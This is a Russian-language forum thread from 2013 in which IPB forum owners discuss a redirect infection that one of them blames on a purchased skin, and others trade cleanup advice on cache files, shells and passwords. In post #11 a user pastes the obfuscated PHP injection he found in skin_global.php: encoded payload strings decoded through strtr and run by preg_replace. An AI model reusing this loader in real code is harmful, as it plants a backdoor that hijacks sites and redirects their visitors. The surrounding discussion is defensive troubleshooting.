Вирус в Skin от Evanescence - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

СвернутьПрикрепленные теги

вирус ipb

  • 2 Страниц +
  • 1
  • 2
  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

Вирус в Skin от Evanescence

#1 Пользователь не на сайте   AlexAuto ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 81
  • Регистрация: 23-Март 08
  • Репутация: 1
  • Откуда:Россия
  • IPB version:3.0.x
 

Отправлено 03 Январь 2013 - 22:55

решил сделать тему так как хочу уберечь других от покупки скина у Evanescence от IBSkin.xxx
купил у них скин 18 числа и сразу установил, 19 числа посещаемость упала в двое, 23 числа пользователь написал что его антивирус матерится на форум RedirDL-inf [Trj], 25 числа начал сам искать вирус, просиходит редирект на сайт xxxx://url4short.info/692f6991 при переходе с поисковиков на форум. перерыл весь движок, поменял все файлы движка, не чего не дало, в итоге попросил специалистов, несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли. посещаемость упала с 60000 до 10000, не кто не смог помочь в поисках проблемы, в итоге сегодня разобрались что все тянется со скриптов скина, скин удалили кеш почистили и все стало четко,
0

#2 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 260
  • Регистрация: 20-Март 09
  • Репутация: 2 071
  • IPB version:3.1.x
 

Отправлено 04 Январь 2013 - 01:48

Это довольно серьезное обвинение, и нужны более весомые доказательства чем "у меня на форуме нашелся вирус". Далеко не факт, что вирус поставлялся вместе с шаблонам. Вы открывали дистрибутив скина, нашли в нем злополучный скрипт? Если версия форума та, что указана в профиле, то у меня для вас "хорошие" новости... Вы в курсе событий про выходы последних патчей безопасности?

60К хостов в день?? Это таки немалая посещаемость,

Просмотреть сообщениеAlexAuto сказал(а):

несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли.

Такие редиректы как правило палятся очень лекго, и искать там особо нечего. Выявляется тип редиректа - серверный или жс и, исходя из типа, проводятся поиски начиная с местах где чаще всего его прописывают.
0

#3 Пользователь не на сайте   AlexAuto ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 81
  • Регистрация: 23-Март 08
  • Репутация: 1
  • Откуда:Россия
  • IPB version:3.0.x
 

Отправлено 04 Январь 2013 - 09:58

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)
версия IPB последняя, про безопастность вкурсе,
0

#4 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 530
  • IPB version:3.4.x
 

Отправлено 04 Январь 2013 - 12:03

У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

Выложите куда-нибудь и скиньте в личку ссылку на дистрибутив скина - и мне будет интересно поискать, и вам будет полезно, если окажется, что проблема все же не в скине.
0

#5 Пользователь не на сайте   Fisana ответил: »

 
 
  • На PM не отвечаю
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 13 190
  • Регистрация: 21-Ноябрь 05
  • Репутация: 695
  • Откуда:Из интернетов
  • IPB version:3.1.x
 

Отправлено 04 Январь 2013 - 12:54

Цитата

У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

Это не причина не доверять.
В 2008 (да и в 2009 вроде) при регистрации еще не требовалось вписывать Board URL.

А еще раньше версию форума тоже не надо было указывать
0

#6 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 260
  • Регистрация: 20-Март 09
  • Репутация: 2 071
  • IPB version:3.1.x
 

Отправлено 04 Январь 2013 - 15:04

Просмотреть сообщениеAlexAuto сказал(а):

да конечно, скрипт подгружаемый по куки с другого сервера

Скрипт где был обнаружен, в дистрибутиве или на рабочем форуме? Если на форуме и при этом не был проверен дистрибутив, тут говорить не о чем. То, что вредоносный скрипт оказался в исходном коде это естественно, это же жс скрипт.

Просмотреть сообщениеFisana сказал(а):

Это не причина не доверять.

Fisana, речь не о доверии, а о некомпетентности автора. ТС конкретно так и не указал, есть ли этот вредоносный код в дистрибутиве шаблона или нет. Поэтому здесь сложно доверять его словам.
0

#7 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 057
  • Регистрация: 13-Апрель 12
  • Репутация: 312
  • Откуда:no
  • IPB version:1.x
 

Отправлено 05 Январь 2013 - 02:38

Просмотреть сообщениеAlexAuto 04 Январь 2013 - 09:58 сказал(а):

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)версия IPB последняя, про безопастность вкурсе,


Это вирус Вашего Форума, а не шаблона. Так, как я сталкивался с этим неоднократно.

Простой пример
Знакомый пишет.
У меня через гугл на форум попасть не возможно, переадресовывает на другой форум. Шаблон у него стоял, который использовал красоты. (Смена цвета и тд).
Взял, удалил его, и все пропало, все работает. Думаю что-то не то. Полез на фтп, в основном все файлы, включая конфиг были заражены. Прописан код Eval(6.
А причина была простая, не стоит храниться пароли, в фтп менеджерах, и стоит периодически их менять. Но есть вероятность хостинг. Сообщите им.
Вирусы сидят, в файлах с расширение php, но лучше проверить все.

Примеры, где я чистил.
conf_global.php
/cache/skin_cache
/cache/lang_cache
/hooks
/ips_kernel
/public/style_images/ (Ваш шаблон). В моем случае, в папке с шаблонов было много php файлов, и все заражены.

Можно ssh поиском, чтобы обнаружить в каких файлах используется этот вредоносный код.
0

#8 Пользователь не на сайте   mizer ответил: »

 
 
  • Newbie
  • *
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 3
  • Регистрация: 18-Апрель 12
  • Репутация: 1
  • IPB version:3.3.x
 

Отправлено 05 Январь 2013 - 15:37

Читать: http://forums.odforc...s-link-problem/

У меня данная зараза сидела в кеше шаблона cache/skin_cache/что-то_там_1/skin_global.php (по памяти). В середине файла идет код инклуда JS (легче сделать поиск по переменной $mds )

Последний патч устраняет дыру.

Я не специалист, но по моему, также перестройка кеша удалит все.

Сообщение изменено: mizer (05 Январь 2013 - 15:38)

0

#9 Пользователь не на сайте   Jet ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 33
  • Регистрация: 26-Март 11
  • Репутация: 0
  • IPB version:4.1.x
 

Отправлено 11 Январь 2013 - 19:29

Да, бяда. Такая же проблема. Появилась еще в декабре. Редирект на вышеуказанный сайт. Думал что почистил, но сейчас проверил, редирект снова стал проявляться. Вот вишь засада, и как его вынести полностью? Может кто напишет подробно как с сей напастью бороться, искать зараженные файлы?
0

#10 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 260
  • Регистрация: 20-Март 09
  • Репутация: 2 071
  • IPB version:3.1.x
 

Отправлено 11 Январь 2013 - 19:32

Искать шеллы.
Сменить пароли (бд, можно фтп).
Читать соответствующие топики на форуме где эта тема обсуждалась уже не один раз.
0

#11 Пользователь не на сайте   Jet ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 33
  • Регистрация: 26-Март 11
  • Репутация: 0
  • IPB version:4.1.x
 

Отправлено 11 Январь 2013 - 23:34

Ну эт понятно. Я рассчитывал больше на подробности, ну ладно, кто ищет собсно, тот найдет. В файле /cache/skin_cache/cacheid_Х/skin_global.php нашел лишнее:
$k='bf05f0304ee14efae6ce9165e0a2c194';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');


Я так понимаю это и есть шелл?
0

#12 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 260
  • Регистрация: 20-Март 09
  • Репутация: 2 071
  • IPB version:3.1.x
 

Отправлено 12 Январь 2013 - 19:26

Да, это и есть одна из его разновидностей. Перестройте кеш, чтобы убедится что код находился только в кеше а не в шаблоне, иначе при перестроении он снова появится.
0

#13 Пользователь не на сайте   Jet ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 33
  • Регистрация: 26-Март 11
  • Репутация: 0
  • IPB version:4.1.x
 

Отправлено 13 Январь 2013 - 21:47

Да, кэш перестроил, код пропал. Пока вродь не редиректит.
0

#14 Пользователь не на сайте   pasha_d ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 22
  • Регистрация: 01-Март 11
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 19 Январь 2013 - 01:59

Блин, та же беда. Подскажите плс лоху. Этот код надо найти через админку в файлах и стереть целиком или там есть какие заморочки и лохам лучче не соваца?
С уважением
0

#15 Пользователь не на сайте   georg2030 ответил: »

 
 
  • Newbie
  • *
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 5
  • Регистрация: 21-Декабрь 10
  • Репутация: 0
  • IPB version:3.2.x
 

Отправлено 16 Февраль 2013 - 17:11

Точно такая же проблема, уже все файлы на все возможные совпадения проверил, всю базу, вообще все что можно. Убираю код из skin_global.php и через некоторое время он снова перезаписывается :(
0

Сообщить об этой теме:


  • 2 Страниц +
  • 1
  • 2
  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна